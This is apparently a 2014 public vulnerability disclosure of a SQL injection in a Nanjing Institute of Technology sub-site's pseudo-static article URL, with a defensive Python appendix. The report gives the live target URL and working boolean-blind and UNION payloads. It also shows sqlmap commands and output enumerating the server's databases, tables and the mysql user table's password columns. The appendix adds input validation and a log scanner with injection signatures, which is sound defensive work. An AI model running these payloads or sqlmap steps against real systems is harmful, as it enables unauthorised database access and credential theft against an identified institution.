2014-06-05: Details have been reported to the vendor and are awaiting the vendor's handling.
2014-06-10: The vendor has actively ignored the vulnerability; details are being disclosed to the public.
Nanjing Institute of Technology (南京工程学院) sub-site: pseudo-static URL injection
Pseudo-static injection URL:
http://dlx.njit.edu.cn/index.php/Article/page/id/198.shtml
---
Place: URI
Parameter: #1*
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://dlx.njit.edu.cn:80/index.php/Article/page/id/198 AND 1397=1397.shtml

    Type: UNION query
    Title: MySQL UNION query (NULL) - 24 columns
    Payload: http://dlx.njit.edu.cn:80/index.php/Article/page/id/-6579 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a6f6271,0x5161594c7175426d4c58,0x71676b6671),NULL,NULL,NULL#.shtml
---
#1. Enumerate the databases:
sqlmap -u http://dlx.njit.edu.cn/index.php/Article/page/id/198*.shtml --dbs
available databases [12]:
[*] bysj
[*] bysj2
[*] bysj_back
[*] bysjback
[*] dlx
[*] dlxy
[*] dqgcsjzx
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
[*] texiaoku
#2. Enumerate the tables:
sqlmap -u http://dlx.njit.edu.cn/index.php/Article/page/id/198*.shtml -D mysql --tables
Database: mysql
[24 tables]
+---------------------------+
| user                      |
| columns_priv              |
| db                        |
| event                     |
| func                      |
| general_log               |
| help_category             |
| help_keyword              |
| help_relation             |
| help_topic                |
| host                      |
| ndb_binlog_index          |
| plugin                    |
| proc                      |
| procs_priv                |
| proxies_priv              |
| servers                   |
| slow_log                  |
| tables_priv               |
| time_zone                 |
| time_zone_leap_second     |
| time_zone_name            |
| time_zone_transition      |
| time_zone_transition_type |
+---------------------------+
#3. Enumerate the columns:
sqlmap -u http://dlx.njit.edu.cn/index.php/Article/page/id/198*.shtml -D mysql -T user --columns
Database: mysql
Table: user
[42 columns]
+------------------------+-----------------------------------+
| Column                 | Type                              |
+------------------------+-----------------------------------+
| User                   | char(16)                          |
| Alter_priv             | enum('N','Y')                     |
| Alter_routine_priv     | enum('N','Y')                     |
| authentication_string  | text                              |
| Create_priv            | enum('N','Y')                     |
| Create_routine_priv    | enum('N','Y')                     |
| Create_tablespace_priv | enum('N','Y')                     |
| Create_tmp_table_priv  | enum('N','Y')                     |
| Create_user_priv       | enum('N','Y')                     |
| Create_view_priv       | enum('N','Y')                     |
| Delete_priv            | enum('N','Y')                     |
| Drop_priv              | enum('N','Y')                     |
| Event_priv             | enum('N','Y')                     |
| Execute_priv           | enum('N','Y')                     |
| File_priv              | enum('N','Y')                     |
| Grant_priv             | enum('N','Y')                     |
| Host                   | char(60)                          |
| Index_priv             | enum('N','Y')                     |
| Insert_priv            | enum('N','Y')                     |
| Lock_tables_priv       | enum('N','Y')                     |
| max_connections        | int(11) unsigned                  |
| max_questions          | int(11) unsigned                  |
| max_updates            | int(11) unsigned                  |
| max_user_connections   | int(11) unsigned                  |
| Password               | char(41)                          |
| plugin                 | char(64)                          |
| Process_priv           | enum('N','Y')                     |
| References_priv        | enum('N','Y')                     |
| Reload_priv            | enum('N','Y')                     |
| Repl_client_priv       | enum('N','Y')                     |
| Repl_slave_priv        | enum('N','Y')                     |
| Select_priv            | enum('N','Y')                     |
| Show_db_priv           | enum('N','Y')                     |
| Show_view_priv         | enum('N','Y')                     |
| Shutdown_priv          | enum('N','Y')                     |
| ssl_cipher             | blob                              |
| ssl_type               | enum('','ANY','X509','SPECIFIED') |
| Super_priv             | enum('N','Y')                     |
| Trigger_priv           | enum('N','Y')                     |
| Update_priv            | enum('N','Y')                     |
| x509_issuer            | blob                              |
| x509_subject           | blob                              |
+------------------------+-----------------------------------+
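The root cause behind the three enumeration steps above is that the "pseudo-static" route /index.php/Article/page/id/<id>.shtml only looks static: the framework still reads the id path segment as a parameter and passes it into SQL unvalidated. The following is an added example for defenders and is not code from the original report or from the affected site. It assumes the route shape shown in the URL above, uses constructed access-log lines and constructed injection signatures (modelled on the two sqlmap techniques the report lists), and shows two things: the server-side validation a numeric route parameter needs, and a small log scanner that flags requests whose id segment carries a boolean-based or UNION-style payload.

```python
import re
from urllib.parse import unquote

# Route shape taken from the URL in the report: /index.php/Article/page/id/<id>.shtml
# The trailing ".shtml" is cosmetic; the framework still treats the "id"
# segment as user input, so it must be validated like a query parameter.
ROUTE_RE = re.compile(r"^/index\.php/Article/page/id/(?P<id>[^/]*?)(?:\.shtml)?$")

# Constructed detection signatures for the two techniques sqlmap reported
# against this site. They are deliberately narrow to keep false positives low.
INJECTION_PATTERNS = [
    ("boolean-based blind", re.compile(r"\bAND\s+\d+\s*=\s*\d+", re.I)),
    ("UNION query", re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I)),
]

# Apache/Nginx combined-log prefix: ip ident user [time] "method path proto" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)

# Constructed sample log. In a real log the payload is percent-encoded
# (spaces as %20, the trailing comment marker as %23), so the scanner
# decodes the path before inspecting it.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jun/2014:10:42:01 +0800] "GET /index.php/Article/page/id/198.shtml HTTP/1.1" 200 5120
203.0.113.5 - - [10/Jun/2014:10:42:02 +0800] "GET /index.php/Article/page/id/198%20AND%201397=1397.shtml HTTP/1.1" 200 5120
203.0.113.5 - - [10/Jun/2014:10:42:03 +0800] "GET /index.php/Article/page/id/-6579%20UNION%20ALL%20SELECT%20NULL,NULL,NULL%23.shtml HTTP/1.1" 200 6100
203.0.113.9 - - [10/Jun/2014:10:42:04 +0800] "GET /index.php/Article/page/id/abc.shtml HTTP/1.1" 200 300
203.0.113.9 - - [10/Jun/2014:10:42:05 +0800] "GET /static/logo.png HTTP/1.1" 200 900
"""


def validate_id(raw):
    """Server-side fix: accept the id only as a plain decimal integer.

    Returns the int, or None for anything else. A value that passes this
    check can be bound as a query parameter; it must never be concatenated
    into the SQL string, which is the defect the report demonstrates.
    """
    return int(raw) if re.fullmatch(r"\d{1,10}", raw) else None


def classify_request(path):
    """Classify one request path.

    Returns ("ok", id) for a clean numeric id, ("injection", technique) when
    the id segment matches a known signature, ("invalid", raw) for any other
    non-numeric id, and None for paths that are not this route at all.
    """
    m = ROUTE_RE.match(unquote(path))
    if not m:
        return None
    raw = m.group("id")
    num = validate_id(raw)
    if num is not None:
        return ("ok", num)
    for name, pattern in INJECTION_PATTERNS:
        if pattern.search(raw):
            return ("injection", name)
    return ("invalid", raw)


def scan_log(text):
    """Return (client_ip, technique) for every logged request whose id
    segment carries an injection signature, in log order."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        verdict = classify_request(m.group("path"))
        if verdict and verdict[0] == "injection":
            hits.append((m.group("ip"), verdict[1]))
    return hits


if __name__ == "__main__":
    for ip, technique in scan_log(SAMPLE_LOG):
        print(f"{ip}\t{technique}")
```

Two points worth noting. The signatures catch the exact techniques in this report and nothing more; a request that reaches validate_id and is rejected as "invalid" is still worth logging, because probes rarely start with a full payload. And the real mitigation is the cast in validate_id together with a bound parameter in the query; signature matching is a detection layer on top of that, not a substitute for it.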
:)
Severity: no impact (vendor ignored)
Ignored at: 2014-06-10 10:42
None yet